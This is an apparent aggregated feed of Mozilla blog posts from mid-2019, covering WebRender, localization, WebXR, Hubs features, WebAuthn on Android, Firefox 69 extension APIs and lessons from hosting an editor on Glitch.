Texture swizzling and allocation

WebRender previously only worked with BGRA for color textures. Unfortunately this format is optimal on some platforms but sub-optimal (or even unsupported) on others. So a conversion sometimes has to happen and this conversion if done by the driver can be very costly.

Kvark reworked the texture caching logic to support using and swizzling between different formats (for example RGBA and BGRA).
A document that landed with the implementation provides more details about the approach and context.

Kvark also improved the texture cache allocation behavior.

Kvark also landed various refactorings (1), (2), (3), (4).

Android improvements

Jamie fixed emoji rendering on webrender on android and continues investigating driver issues on Adreno 3xx devices.

Displaylist serialization

Dan replaced bincode in our DL IPC code with a new bespoke and private serialization library (peek-poke), ending the terrible reign of the secret serde deserialize_in_place hacks and our fork of serde_derive.

Picture caching improvements

Glenn landed several improvements and fixes to the picture caching infrastructure:

  • Bug 1566712 – Fix quality issueswith picture caching when transform has fractional offsets.
  • Bug 1572197 – Fix world clip region for preserve-3d items with picture caching.
  • Bug 1566901 – Make picture caching more robust to float issues.
  • Bug 1567472 – Fix bug in preserve-3d batching code in WebRender.

Font rendering improvements

Lee landed quite a few font related patches:

  • Bug 1569950 – Only partially clear WR glyph caches if it is not necessary to fully clear.
  • Bug 1569174 – Disable embedded bitmaps if ClearType rendering mode is forced.
  • Bug 1568841 – Force GDI parameters for GDI render mode.
  • Bug 1568858 – Always stretch box shadows except for Cairo.
  • Bug 1568841 – Don’t use enhanced contrast on GDI fonts.
  • Bug 1553818 – Use GDI ClearType contrast for GDI font gamma.
  • Bug 1565158 – Allow forcing DWrite symmetric rendering mode.
  • Bug 1563133 – Limit the GlyphBuffer capacity.
  • Bug 1560520 – Limit the size of WebRender’s glyph cache.
  • Bug 1566449 – Don’t reverse glyphs in GlyphBuffer for RTL.
  • Bug 1566528 – Clamp the amount of synthetic bold extra strikes.
  • Bug 1553228 – Don’t free the result of FcPatternGetString.

Various fixes and improvements

  • Gankra fixed an issue with addon popups and document splitting.
  • Sotaro prevented some unnecessary composites on out-of-viewport external image updates.
  • Nical fixed an integer oveflow causing the browser to freeze
  • Nical improved the overlay profiler by showing more relevant numbers when the timings are noisy.
  • Nical fixed corrupted rendering of progressively loaded images.
  • Nical added a fast path when none of the primitives of an image batch need anti-aliasing or repetition.

SeaMonkeyBuild3 has been “candidatized”…

Hi everyone!

Build 3 has been pushed to the regular candidates path.  I’ve coined a ‘new’ term “candidatized”, meaning it’s been sent to the candidates path on archive.mo.

That said, there’s a chance it’ll be dubbed 2.49.5 instead of rc3.

Also, that said, there’s a few changes from the previous automation-based releases/candidates; that being, a lot of the files that are supposed to be there, aren’t and files that shouldn’t be there, are.  The automation is still not working.  The automation that’s in place is manual…  😛

Yes, we’re missing a README file.   No fear…  that’s coming next.  So if you refresh that main build3/ page, it should appear within 24 hrs provided it’s there.  [motif being “it’s there when it’s there.”]

Again, I cannot stress this out.  Both IanN and frg were the mainstays of this release.  So all round applause to them!


hacks.mozilla.orgUsing WebThings Gateway notifications as a warning system for your home

Ever wonder if that leaky pipe you fixed is holding up? With a trip to the hardware store and a Mozilla WebThings Gateway you can set up a cheap leak sensor to keep an eye on the situation, whether you’re home or away. Although you can look up detector status easily on the web-based dashboard, it would be better to not need to pay attention unless a leak actually occurs. In the WebThings Gateway 0.9 release, a number of different notification mechanisms can be set up, including emails, apps, and text messages.

Leak Sensor Demo


In this post I’ll show you how to set up gateway notifications to warn you of changes in your home that you care about. You can set each notification to one of three levels of severity–low, normal, and high–so that you can identify which are informational changes and which alerts should be addressed immediately (fire! intruder! leak!). First, we’ll choose a device to worry about. Next, we’ll decide how we want our gateway to contact us. Finally, we’ll set up a rule to tell the gateway when it should contact us.

Choosing a device

First, make sure the device you want to monitor is connected to your gateway. If you haven’t added the device yet, visit the Gateway User Guide for information about getting started.

Now it’s time to figure out which things’ properties will lead to interesting notifications. For each thing you want to investigate, click on its splat icon to get a full view of all its properties.

View of all gateway things with splat icon of leak sensor highlighted Detailed Leak Sensor view

You may also want to log properties of various analog devices over time to see what values are “normal”. For example, you can monitor the refrigerator temperature for a couple of days to help determine what qualifies as an abnormal temperature. In this graph, you can see the difference between baseline power draw (around 20 watts) and charging (up to 90 watts).

Graph of laptop charger plug power over the last day with clear differentiation between off, standby, and charging states

Charger Power Consumption Graph

In my case, I’ve selected a leak sensor so I won’t need to log data in advance. It’s pretty clear that I want to be notified when the leak property of my sensor becomes true (i.e., when a leak is detected). If instead you want to monitor a smart plug, you can look at voltage, power, or on/off state. Note that the notification rules you create will let you combine multiple inputs using “and” or “or” logic. For example, you might want to be alerted if indoor motion is detected “and” all of the family smartphone “presence” states are “inactive” (i.e., no one in your family is home, so what caused motion?). Whatever your choice, keep the logical states of your various sensors in mind while you set up your notifier.

Setting up your notifier

The 0.9 WebThings Gateway release added support for notifiers as a specific form of add-on. Thanks to the efforts of the community and a bit of our own work, your gateway can already send you notifications over email, SMS, Telegram, or specialized push notification apps with new add-ons released every week. You can find several notification add-on options by clicking “+” on the Settings > Add-ons page.

Main menu with settings highlighted Settings page with add-ons section highlighted Initial list of installed add-ons without email add-on List of installable add-ons with email sender highlighted List of installed add-ons with link to README of email add-on highlighted

The easiest-to-use notifiers are email and SMS since there are fewer moving parts, but feel free to choose whichever approach you prefer. Follow the configuration instructions in your chosen notifier’s README file. You can get to the README for your notifier by clicking on the author’s name in the add-on list then scrolling down.

You’ll find a complete guide to the email notifier here: https://github.com/mozilla-iot/email-sender-adapter#email-sender-adapter.

Creating a rule

Finally, let’s teach our gateway how and when it should yell for attention. We can set this up in a simple drag-and-drop rule. First, drag your device to the left as a trigger and select the “Leak” property.

Dragging and dropping the leak block into the rule Where to click to open the leak block's select property dropdown Configuring the leak block through a dropdown

Next, drag your notification channel to the right as an effect and configure its title, body, and level as desired.

Illustration of dragging email block into rule Rule after email block is dropped into it Configuring the email part of the rule through a dropdown

Your rule is now set up and ready to go!

Fully configured if leak then send email rule

The finished rule!

You can now manually test it out. For a leak sensor you can just spill a little water on it to make sure you get a text, email, or other notification warning you about a possible scary flood. This is also a perfect time to start experimenting. Can you set up a second, louder notification for when you’re asleep? What about only notifying when you’re at home so you can deal with the leak immediately?

Advanced rule logic where if the leak sensor is active and "phone at home" is true then it sends an email

A more advanced rule

Notifications are just one small piece of the WebThings Gateway ecosystem. We’re trying to build a future where the convenience of a connected life doesn’t require giving up your security and privacy. If you have ideas about how the WebThings Gateway can better orchestrate your home, please comment on Discourse or contribute on GitHub. If your preferred notification channel is missing and you can code, we love community add-ons! Check out the source code of the email add-on for inspiration. Coming up next, we’ll be talking about how you can have a natural spoken dialogue with the WebThings Gateway without sending your voice data to the cloud.

The post Using WebThings Gateway notifications as a warning system for your home appeared first on Mozilla Hacks - the Web developer blog.

Mozilla L10NL10n Report: August Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 


New localizers:

  • Mohsin of Assanese (as) is committed to rebuild the community and has been contributing to several projects.
  • Emil of Syriac (syc) joined us through the Common Voice project.
  • Ratko and Isidora of Serbian (sr) have been prolific contributors to a wide range of products and projects since joining the community.
  • Haile of Amheric (am) joined us through the Common Voice project, is busy localizing and recruiting more contributors so he can rebuild the community.
  • Ahsun Mahmud of Bengali (bn) focuses his interest on Firefox.

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New community/locales added

  • Maltese (mt)
  • Romansh Vallader (rm-vallery)
  • Syriac (syc)

New content and projects

What’s new or coming up in Firefox desktop

We’re quickly approaching the deadline for Firefox 69. The last day to ship your changes in this version is August 20, less than a week away.

A lot of content targeting Firefox 70 already landed and it’s available in Pontoon for translation, with more to come in the following days. Here are a few of the areas where you should focus your testing on.


This is the new password manager for Firefox. If you don’t plan to store the passwords in your browser, you should at least create a new profile to test the feature and its interactions (adding logins, editing, removing, etc.).

Enhanced Tracking Protection (ETP) and Protection Panels

This is going to be the main focus for Firefox 70:

  • New protection panel displayed when clicking the shield icon in the address bar.
  • Updated preferences.
  • New about:protections page. The content of this page will be exposed for localization in the coming days.

With ETP there will be several new terms to define for your language, like “Cross-Site Tracking Cookies” or “Social Media Trackers”. Make sure they’re translated consistently across the products and websites.

The deadline to ship localization for Firefox 70 will be October 8.

What’s new or coming up in mobile

It’s summer vacation time in mobile land, which means most projects are following the usual course of things.

Just like for Desktop, we’re quickly approaching the deadline for Firefox Android v69. The last day to ship your changes in this version is August 20.

Another thing to note is that we’ve exposed strings for Firefox iOS v19 (deadline TBD soon).

Other projects are following the usual continuous localization workflow. Stay tuned for the next report as there will be novelties then for sure!

What’s new or coming up in web projects

Firefox Accounts

A lot of strings landed earlier this month. If you need to prioritize what to localize first, look for string IDs containing `delete_account` or `sync-engines`. Expect more strings to land in the coming weeks.


The following files were added or updated since the last report.

  • New: firefox/adblocker.lang and firefox/whatsnew_69.lang (due on 26 of August)
  • Update: firefox/new/trailhead.lang

The navigation.lang file has been made available for localization for some time. This is a shared file, and the content is on production whether the file is fully localized or not. If this is not fully translated, make sure to give this file higher priority to complete soon.

What’s new or coming up in Foundation projects

More content from foundation.mozilla.org will be exposed to localization in de, es, fr, pl, pt-BR over the next few weeks! Content is exposed in different stages, because the website is built using different technologies, which makes it challenging for localization. The main pages will be available in the Engagement project, and a new tag can help have a look at them. Other template strings will be exposed in a new project later.

donate.mozilla.org is getting an update too! The website is being rebuilt from the ground up with a new system that will make it easier to maintain. The UI won’t change too much, so the copy will mostly remain the same. However, it won’t be possible to migrate the current translations to the new system, instead we will heavily rely on Pontoon’s translation memory.
Once the new website is ready, the current project in Pontoon will be set to “read only” mode during a transition period and a new project will be enabled.

Please make sure to review any pending suggestion over the next few weeks, so that they get properly added to the translation memory and are ready to be reused into the new project.

What’s new or coming up in SuMo

Newly published articles:

What’s new or coming up in Pontoon

The Translate.Next work moves on. We hope to have it wrapped up by the end of this quarter (i.e., end of September). Help us test by turning on Translate.Next from the Pontoon translation editor.

Newly published localizer facing documentation


  • Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver and we’ll include that (see links to emails at the bottom of this report)

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact one of the l10n-drivers, and we’ll make sure they get a shout-out (see list at the bottom)!

Useful Links

Questions? Want to get involved?

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.

Mozilla VR BlogWebXR category in JS13KGames!

WebXR category in JS13KGames!

Today starts the 8th edition of the annual js13kGames competition and we are sponsoring its WebXR category with a bunch of prizes including Oculus Quest headsets!

Like many other game development contests, the main goal of the js13kGames competition is to make a game based on a given theme under a specific amount of time. This year’s theme is "BACK" and the time you have to work on your game is a whole month, from today to September 13th.
There is, of course, another important rule you must follow: the zip containing your game should not weigh more than 13kb. (Please follow this link for the complete set of rules). Don’t let the size restriction discourage you. Previous competitors have done amazing things in 13kb.

This year, as in the previous editions, Mozilla is sponsoring the competition, with special emphasis on the WebXR category, where, among other prizes, the best three games will get an Oculus Quest headset!

Like many other game development contests, the main goal is to release a game based on a given theme under a specific amount of time. This year’s theme is "BACK" and the time you have to work on your game is a whole month, from today to 13th September.
There is, of course, another important rule you must follow: the zip containing your game should not weigh more than 13kb. (Please follow this link for the complete set of rules).

This year, as in the previous editions, Mozilla is again sponsoring the competition, with special emphasis on the WebXR category, where, among other prizes, the best three games will get an Oculus Quest headset!

WebXR category in JS13KGames!

Frameworks allowed

Last year you were allowed to use A-Frame and Babylon.js in your game. This year we have been working with the organization to include three.js on that list!
Because these frameworks weigh far more than 13kb, the requirements for this category have been softened. The size of the framework builds won’t count as part of the final 13kb limit. The allowed links for each framework to include in your game are the following:

WebXR category in JS13KGames!

The allowed links per framework to include on your game are the following:

If you feel you can present a WebXR game without using any third-party framework and still keep the 13kb limit for the whole game, you are free to do so and I’m sure the judges will value that fact.

You may use any kind of input system: gamepad, gazer, 3dof or 6dof controllers and we will still be able to test your game in different VR devices. Please indicate in the description what the device/input requirements are for your game.
If you have a standalone headset, please make sure you try your game on Firefox Reality because we plan to feature the best games of the competition on the Firefox Reality homepage.


Here are some useful links if you need some help or want to share your progress!

Enjoy and good luck!

Mozilla VR BlogCustom elements for the immersive web

Custom elements for the immersive web

We are happy to introduce the first set of custom elements for the immersive web we have been working on: <img-360> and <video-360>

From the Mixed Reality team, we keep working on improving the content creator experience, building new frameworks, tools, APIs, performance tuning and so on.
Most of these projects are based on the assumption that the users have a basic knowledge of 3D graphics and want to go deep on fully customizing their WebXR experience, (eg: using A-Frame or three.js).
But there are still a lot of use cases where content creators just want very simple interactions and don’t have the knowledge or time to create and maintain a custom application built on top of a WebXR framework.

With this project we aim to address the problems these content creators have by providing custom elements with simple, yet polished features. One could be just a simple 360 image or video viewer, another one could be a tour allowing the user to jump from one image to another.

Custom elements for the immersive web

Custom elements provide a standard way to create HTML elements to provide simple functionality that matches expectations of content creators without knowledge of 3D, WebXR or even Javascript.

How does this work?

Just include the Javascript bundle on your page and you could start using both elements in your HTML: <img-360> and <video-360>. You just need to provide them with a 360 image or video and the custom elements will do the rest, including detecting WebVR support. Here is a simple example that adds a 360 image and video to a page. All of the interaction controls are generated automatically:

You can try a demo here and find detailed information on how to use them on Github.

Next steps

Today we are releasing just these two elements but we have many others in mind and would love your feedback. What new elements would you find useful? Please join us on GitHub to discuss them.
We are also excited to see other companies working hard on providing quality custom elements for the 3D and XR web as Google with their <model-viewer> component and we hope others will follow.

Mozilla VR BlogA Summer with Particles and Emojis

A Summer with Particles and Emojis

This summer I am very lucky to join the Hubs by Mozilla as a technical artist intern. Over the 12 weeks that I was at Mozilla, I worked on two different projects.
My first project is about particle systems, the thing that I always have great interest in. I was developing the particle system feature for Spoke, the 3D editor which you can easily create a 3D scene and publish to Hubs.

Particle systems are a technique that has been used in a wide range of game physics, motion graphics and computer graphics related fields. They are usually composed of a large number of small sprites or other objects to simulate some chaotic system or natural phenomena. Particles can make a huge impact on the visual result of an application and in virtual and augmented reality, it can deepen the immersive feeling greatly.

Particle systems can be incredibly complex, so for this version of the Particle System, we wanted to separate the particle system from having heavy behaviour controls like some particle systems from native game engines, only keeping the basic attributes that are needed. The Spoke particle system can be separated into two parts, particles and the emitter. Each particle, has a texture/sprite, lifetime, age, size, color, and velocity as it’s basic attributes. The emitter is more simple, as it only has properties for its width and height and information about the particle count (how many particles it can emit per life circle).

By changing the particle count and the emitter size, users can easily customize a particle system for different uses, like to create falling snow in a wintry scene or add a small water splash to a fountain.
A Summer with Particles and Emojis
Changing the emitter size

A Summer with Particles and Emojis
Changing the number of particles from 100 to 200

You can also change the opacities and the colors of the particles. The actual color and opacity values are interpolated between start, middle and end colors/opacities.
A Summer with Particles and Emojis

And for the main visuals, we can change the sprites to the image we want by using a URL to an image, or choosing from your local assets.
A Summer with Particles and Emojis

What does a particle’s life cycle look like? Let’s take a look at this chart:
A Summer with Particles and Emojis
Every particle is born with a random negative initial age, which can be adjusted through the Age Randomness property after it’s born, its age will keep growing as time goes by. When its age is bigger than the total lifetime (formed by Lifetime and Lifetime Randomness), the particle will die immediately and be re-assigned a negative initial age, then start over again. The Lifetime here is not the actual lifetime that every particle will live, in order to not have all particles disappear at the same time, we have this Lifetime Randomness attribute to vary the actual lifetime of each particle. The higher the Lifetime Randomness, the larger the differentiation will be among the actual lifetimes of whole particle system. There is another attribute called Age Randomness, which is similar to Lifetime Randomness. The difference is that Age Randomness is used to vary the negative initial ages to have a variation on the birth of the particles, while Lifetime Randomness is to have the variation on the end of their lives.

Every particle also has velocity properties across the x, y and x axis. By adjusting the velocity in three dimensions, users can have a better control on particles’ behaviours. For example, simulation gravity or wind that kind of simple phenomena.
A Summer with Particles and Emojis
With angular velocity, you can also control on the rotation of the particle system to have a more natural and dynamic result.
A Summer with Particles and Emojis

The velocity, color and size properties all have the option to use different interpolation functions between their start, middle and end stages.

A Summer with Particles and Emojis
The particle system is officially out on Spoke, so go try it out and let us know what you think!
A Summer with Particles and Emojis

Avatar Display Emojis

My other project is about the avatar emoji display screen on Hubs. I did the design of the emojis images, UI/UX design and the actual implementation of this feature. It’s actually a straightforward project: I needed to figure out the style of the emoji display on the chest screen, some graphics design on the interface level, make decisions on the interaction flow and implement it in Hubs.

A Summer with Particles and Emojis
Evolution of the display emoji design.

We ultimately decided to have the smooth edge emoji with some bloom effect.
A Summer with Particles and Emojis
Final version of the display emoji design

A Summer with Particles and Emojis
Icon design for the menu user interface

A Summer with Particles and Emojis
Interaction design using Hubs display styles

A Summer with Particles and Emojis

When you enter pause mode on Hubs, the emoji box will show up, replacing the chat box, and you can change your avatar’s screen to one of the emojis offered.

I want to say thank you to Hubs for having me this summer. I learned a lot from all the talented people in Hubs, especially Robert, Jim, Brian and Greg who helped me a lot to overcome the difficulties I came across. The encouragement and support from the team is the best thing I got this summer. Miss you guys already!
A Summer with Particles and Emojis

SUMO BlogCommunity Management Update

Hello SUMO community,

I have a couple announcements for today. I’d like you all to welcome our two new community managers.

First off Kiki has officially joined the SUMO team as a community manager. Kiki has been filling in with Konstantina and Ruben on our social support activities. We had an opportunity to bring her onto the SUMO team full time starting last week. She will be transitioning out of her responsibilities at the Community Development Team and will be continuing her work on the social program as well as managing SUMO days going forward.

In addition, we have hired a new SUMO community manager to join the team. Please welcome Giulia Guizzardi to the SUMO team.

You can find her on the forums as gguizzardi. Below is a short introduction:

Hey everyone, my name is Giulia Guizzardi, and I will be working as a Support Community Manager for Mozilla. 

I am currently based in Berlin, but I was born and raised in the north-east of Italy. I studied Digital Communication in Italy and Finland, and worked for half a year in Poland.

My greatest passion is music, I love participating in festivals and concerts along with collecting records and listening to new releases all day long. Other than that, I am often online, playing video games (Firewatch at the moment) or scrolling Youtube/Reddit.

I am really excited for this opportunity and happy to work alongside the community!

Now that we have two new community managers we will work with Konstantina and Ruben to transition their work to Kiki and Giulia. We’re also kicking off work to create a community strategy which we will be seeking feedback for soon. In the meantime, please help me welcome Kiki and Giulia to the team.

SeaMonkeyBuild numero deux


After a long delay, I’ve uploaded the build2 of 2.49.5.

Checksums are there.

Next to be done will be build #3.


Web Application SecurityWeb Authentication in Firefox for Android

Firefox for Android (Fennec) now supports the Web Authentication API as of version 68. WebAuthn blends public-key cryptography into web application logins, and is our best technical response to credential phishing. Applications leveraging WebAuthn gain new  second factor and “passwordless” biometric authentication capabilities. Now, Firefox for Android matches our support for Passwordless Logins using Windows Hello. As a result, even while mobile you can still obtain the highest level of anti-phishing account security.

Firefox for Android uses your device’s native capabilities: On certain devices, you can use built-in biometrics scanners for authentication. You can also use security keys that support Bluetooth, NFC, or can be plugged into the phone’s USB port.

The attached video shows the usage of Web Authentication with a built-in fingerprint scanner: The demo website enrolls a new security key in the account using the fingerprint, and then subsequently logs in using that fingerprint (and without requiring a password).

Adoption of Web Authentication by major websites is underway: Google, Microsoft, and Dropbox all support WebAuthn via their respective Account Security Settings’ “2-Step Verification” menu.

A few notes

For technical reasons, Firefox for Android does not support the older, backwards-compatible FIDO U2F Javascript API, which we enabled on Desktop earlier in 2019. For details as to why, see bug 1550625.

Currently Firefox Preview for Android does not support Web Authentication. As Preview matures, Web Authentication will be joining its feature set.


The post Web Authentication in Firefox for Android appeared first on Mozilla Security Blog.

Mozilla Add-ons BlogExtensions in Firefox 69

In our last post for Firefox 68, we’ve introduced a great number of new features. In contrast, Firefox 69 only has a few new additions. Still, we are proud to present this round of changes to extensions in Firefox.

Better Topsites

The topSites API has received a few additions to better allow developers to retrieve the top sites as Firefox knows them. There are no changes to the defaults, but we’ve added a few options for better querying. The browser.topSites.get() function has two additional options that can be specified to control what sites are returned:

  • includePinned can be set to true to include sites that the user has pinned on the Firefox new tab.
  • includeSearchShortcuts can be set to true for including search shortcuts

Passing both options allows to mimic the behavior you will see on the new tab page, where both pinned results and search shortcuts are available.

User Scripts

This is technically an addition to Firefox 68, but since we didn’t mention it in the last blog post it gets an honorable mention here. In March, we announced that user scripts were coming, and now they are here. Starting with Firefox 68,  you will be able to use the userScripts API without needing to set any preferences in about:config.

The great advantage of the userScripts API is that it can run scripts with reduced privileges. Your extension can provide a mechanism to run user-provided scripts with a custom API, avoiding the need to use eval in content scripts. This makes it easier to adhere to the security and privacy standards of our add-on policies. Please see the original post on this feature for an example on how to use the API while we update the documentation.


  • The downloads API now correctly supports byExtensionId and byExtensionName for extension initiated downloads.
  • Clearing site permissions no longer re-prompts the user to accept storage permissions after a restart.
  • Using alert() in a background page will no longer block the extension from running.
  • The proxy.onRequest API now also supports FTP and WebSocket requests.

A round of applause goes to our volunteer contributors Martin Matous, Michael Krasnov, Myeongjun Go, Joe Jalbert, as well as everyone else who has made these additions in Firefox 69 possible.

The post Extensions in Firefox 69 appeared first on Mozilla Add-ons Blog.

Mozilla VR BlogLessons from Hacking Glitch

Lessons from Hacking Glitch

When we first started building MrEd we imagined it would be done as a traditional web service. A potential user goes to a website, creates an account, then can build experiences on the site and save them to the server. We’ve all written software like this before and had a good idea of the requirements. However, as we started actually building MrEd we realized there were additional challenges.

First, MrEd is targeted at students, many of them young. My experience with teaching kids during previous summers let me know that they often don’t have email addresses, and even if they do there are privacy and legal issues around tracking what the students do. Also, we knew that this was an experiment which would end one day, but we didn’t want the students to lose access to this tool they just had just learned.

After pondering these problems we thought Glitch might be an answer. It supports anonymous use out of the box and allows easy remixing. It also has a nice CDN built in; great for hosting models and 360 images. If it would be possible to host the editor as well as the documents then Glitch would be the perfect platform for a self contained tool that lives on after the experiment was done.

The downside of Glitch is that many of its advanced features are undocumented. After much research we figured out how to modify Glitch to solve many problems, so now we’d like to share our solutions with you.

Making a Glitch from a Git Repo

Glitch’s editor is great for editing a small project, but not for building large software. We knew from the start that we’d need to edit on our local machines and store the code in a GitHub repo. The question was how to get that code initially into Glitch? It turns out Glitch supports creating a new project from an existing git repo. This was a fantastic advantage.

Lessons from Hacking Glitch

We could now create a build of the editor and set up the project just how we like, keep it versioned in Git, then make a new Glitch whenever we needed to. We built a new repo called mred-base-glitch specifically for this purpose and documented the steps to use it in the readme.

Integrating React

MrEd is built in React, so the next challenge was how to get a React app into Glitch. During development we ran the app locally using a hotreloading dev server. For final production, however, we need static files that could be hosted anywhere. Since our app was made with create-react-app we can build a static version with npm run build. The problem is that it requires you to set the hostname property in your package.json to calculate the final URL references. This wouldn’t work for us because someone’s Glitch could be renamed to anything. The solution was to set the hostname to ., so that all URLs are relative.

Next we wanted the editor to be hidden. In Glitch the user has a file list on the left side of the editor. While it’s fine to have assets and scripts be visible, we wanted the generated React code to be hidden. It turns out Glitch will hide any directory if it begins with dot: .. So in our base repo we put the code into public/.mred.

Finally we had the challenge of how to update the editor in an existing glitch without over-writing assets and documents the user had created.

Rather than putting everything into one git repo we made two. The first repo, mred, contains just the code to build the editor in React. The second repo, mred-base-glitch, contains the default documents and behaviors. This second repo integrates the first one as a git submodule. The compiled version of the editor also lives in the mred repo in the build directory. This way both the source and compiled versions of the editor can be versioned in git.

Whenever you want to update the editor in an existing glitch you can go to the Glitch console and run git submodule init and git submodule update to pull in just the editor changes. Then you can update the glitch UI with refresh. While this was a manual step, the students were able to do it easily with instruction.

Loading documents

The editor is a static React app hosted in the user’s Glitch, but it needs to save documents created in the editor at some location. Glitch doesn’t provide an API for programmatically loading and saving documents, but any Glitch can have a NodeJS server in it so we built a simple document server with express. The doc server scans the documents and scripts directories to produce a JSON API that the editor consumes.

For the launch page we wanted the user to see a list of their current projects before opening the editor. For this part the doc server has a route at / which returns a webpage containing the list as links. For URLs that need to be absolute the server uses a magic variable provided by Glitch to determine the hostname: process.env.PROJECT_DOMAIN.

The assets were a bit trickier than scripts and docs. The editor needs a list of available assets, but we can’t just scan the assets directory because assets aren’t actually stored in your Glitch. Instead they live on Glitch’s CDN using long generated URLs. However, the Glitch does have a hidden file called .glitch-assets which lists all of the assets as a JSON doc, including the mime types.

We discovered that a few of the files students wanted to use, like GLBs and WAVs, aren’t recognized by Glitch. You can still upload these files to the CDN but the .glitch-assets file won’t list the correct mime-type, so our little doc server also calculated new mime types for these files.

Having a tiny document server in the Glitch gave us a lot of flexibility to fix bugs and implement missing features. It was definitely a design win.

User Authentication

Another challenge with using Glitch is user authentication. Glitch has a concept of users and will not let a user edit someone else’s glitch without permission, but this user system is not exposed as an API. Our code had no way to know if the person interacting with the editor is the owner of that glitch or not. There are rumors of such a feature in the future, but for now we made do with a password file.

It turns out glitches can have a special file called .env for storing passwords and other secure environment variables. This file can be read by code running in the glitch, but it is not copied when remixing, so if someone remixes your glitch they won’t find out your password. To use this we require students to set a password as soon as the remix the base glitch. Then the doc server will use the password for authenticating communication with the editor.

Future Features

We managed to really modify Glitch to support our needs and it worked quite well. That said, there are a few features we’d like them to add in the future.

Documentation. Almost everything we did above came after lots of research in the support forums, and help from a few Glitch staffers. There is very little official documentation of how to do beyond basic project development. It would be nice if there was an official docs site beyond the FAQs.

A real authentication API. Using the .env file was a nice hack, but it would be nice if the editor itself could respond properly to the user. If the user isn’t logged in it could show a play only view of the experience. If the user is logged in but isn’t the owner of the glitch then it could show a remix button.

A way to populate assets programmatically. Everything you see in a glitch when you clone from GitHub comes from the underlying git repo except for the assets. To create a glitch with a pre-set list of assets (say for doing specific exercises in a class) requires manually uploading the files through the visual interface. There is no way (at least that we could find) to store the assets in the git repo or upload them programmatically.

Overall Glitch worked very well. We got an entire visual editor, assets, and document storage into a single conceptual chunk -- a glitch -- that can be shared and remixed by anyone. We couldn’t have done what we needed on such a short timeline without Glitch. We thank you Glitch Team!

Mozilla VR BlogHubs July Update

Hubs July Update

We’ve introduced new features that make it easier to moderate and share your Hubs experience. July was a busy month for the team, and we’re excited to share some updates! As the community around Hubs has grown, we’ve had the chance to see different ways that groups meet in Hubs and are excited to explore new ways that groups can choose what types of experience they want to have. Different communities have different needs for how they’re meeting in Hubs, and we think that these features are a step towards helping people get co-present together in virtual spaces in the way that works best for them.

Room-Level Permissions
It is now possible for room owners to specify which features are granted to other users in the room. This allows the owner of the room to decide if people can add media to the room, draw with the pen, pin objects, and create cameras. If you’re using Hubs for a meeting or event where there will be a larger number of attendees, this can help keep the room organized and free from distractions.

Hubs July Update

Promoting Moderators
For groups that hold larger events in Hubs, there is now the ability to promote other users in a Hubs room to also have the capabilities of the room owner. If you’ve been creating rooms using the Hubs Discord bot,you may already be familiar with rooms that have multiple owners. This feature can be especially valuable for groups that have a core set of administrators who are available in the room to help moderate and keep events running smoothly. Room owners can promote other users to moderators by opening up the user list and selecting the user from a list, then clicking ‘Promote’ on the action list. You should only promote trusted users to moderator, since they’ll have the same permissions as you do as the room owner. Users must be signed in to be promoted.

Camera Mode
Room owners can now hide the Hubs user interface by enabling camera mode, which was designed for groups that want to have a member in the room record or livestream their gathering. When in camera mode, the room owner will broadcast the view from their avatar and replace the Lobby camera, and non-essential UI elements will be hidden. The full UI can be hidden by clicking the ‘Hide All’ button, which allows for a clear, unobstructed view of what’s going on in the room.

Video Recording
The camera tool in Hubs can now be used to record videos as well as photos. When a camera is created in the room, you can toggle different recording options that can be used by using the UI on the camera itself. Like photos, videos that are taken with the in-room camera will be added to the room after they have finished capturing. Audio for videos will be recorded from the position of the avatar of the user who is recording. While recording video on a camera, users will have an indicator on their display name above their head to show that they are capturing video. The camera itself also contains a light to indicate when it is recording.

Hubs July Update

Tweet from Hubs
For users who want to share their photos, videos, and rooms through Twitter, you can now tweet from directly inside of Hubs when media is captured in a room. When you hover over a photo or video that was taken by the in-room camera, you will see a blue ‘Tweet’ button appear. The first time you share an image or video through Twitter, you will be prompted to authenticate to your Twitter account. You can review the Hubs Privacy Policy and third-party notices here, and revoke access to Hubs from your Twitter account by going to https://twitter.com/settings/applications.

Embed Hubs Rooms
You can now embed a Hubs room directly into another web page in an iFrame. When you click the 'Share' button in a Hubs room, you can copy the embed code and paste it into the HTML on another site. Keep in mind that this means anyone who visits that page will be able to join!

Hubs July Update

Discord Bot Notifications
If you have the Hubs Discord bot in your server and bridged to a channel, you can now set a reminder to notify you of a future event or meeting. Just type in the command !hubs notify set mm/dd/yyyy and your time zone, and the Hubs Bot will post a reminder when the time comes around.

Microphone Level Indicator
Have you ever found yourself wondering if other people in the room could hear you, or forgotten that you were muted? The microphone icon in the HUD now shows mic activity level, regardless of whether or not you have your mic muted. This is a handy little way to make sure that your microphone is picking up your audio, and a nice reminder that you’re talking while muted.

In the coming months, we will be continuing work on new features aimed at enabling communities to get together easily and effectively. We’ll also be exploring improvements to the avatar customization flow and new features for Spoke to improve the tools available to creators to build their own spaces for their Hubs rooms. To participate in the conversation about new features and join our weekly community meetups, join us on Discord using the invitation link here.

Open Policy & AdvocacyMozilla calls for transparency in compelled access case

Sometime last year, Facebook challenged a law enforcement request for access to encrypted communications through Facebook Messenger, and a federal judge denied the government’s demand. At least, that is what has been reported by the press. Troublingly, the details of this case are still not available to the public, as the opinion was issued “under seal.” We are trying to change that.

Mozilla, with Atlassian, has filed a friend of the court brief in a Ninth Circuit appeal arguing for unsealing portions of the opinion that don’t reveal sensitive or proprietary information or, alternatively, for releasing a summary of the court’s legal analysis. Our common law legal system is built on precedent, which depends on the public availability of court opinions for potential litigants and defendants to understand the direction of the law. This opinion would have been only the third since 2003 offering substantive precedent on compelled access—thus especially relevant input on an especially serious issue.

This case may have important implications for the current debate about whether and under what circumstances law enforcement can access encrypted data and encrypted communications. The opinion, if disclosed, could help all kinds of tech companies push back on overreaching law enforcement demands. We are deeply committed to building secure products and establishing transparency and control for our users, and this information is vital to enabling those ends. As thoughtful, mission-driven engineers and product designers, it’s critical for us as well as end users to understand the legal landscape around what the government can and cannot require.

The post Mozilla calls for transparency in compelled access case appeared first on Open Policy & Advocacy.

hacks.mozilla.orgNew CSS Features in Firefox 68

Firefox 68 landed earlier this month with a bunch of CSS additions and changes. In this blog post we will take a look at some of the things you can expect to find, that might have been missed in earlier announcements.

CSS Scroll Snapping

